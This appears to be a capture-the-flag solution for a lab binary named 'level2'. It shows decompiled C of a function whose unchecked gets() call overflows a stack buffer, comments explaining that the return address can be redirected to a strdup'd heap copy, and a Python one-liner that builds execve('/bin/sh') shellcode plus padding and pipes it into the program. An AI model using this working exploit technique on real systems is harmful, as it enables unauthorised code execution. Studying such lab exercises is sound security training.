

//----- (080484D4) --------------------------------------------------------
char *p()
{
  char s[64]; // [esp+1Ch] [ebp-4Ch] BYREF
  const void *v2; // [esp+5Ch] [ebp-Ch]
  unsigned int retaddr; // [esp+6Ch] [ebp+4h]

  fflush(stdout);
  // the buffer overflow is here, and after a check on gdb, the retur address is 80 bytes after the buffer
  gets(s);
  v2 = (const void *)retaddr;
  // we can't use stack address because of that
  if ( (retaddr & 0xB0000000) == -1342177280 )
  {
    printf("(%p)\n", v2);
    _exit(1);
  }
  puts(s);
  // but we can use the address pointed by strdup
  return strdup(s); // 0x0804a008
}

python -c "print '\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' + 55 * 'a' + '\x08\xa0\x04\x08' " > /tmp/level2_exploit
cat /tmp/level2_exploit - | ./level2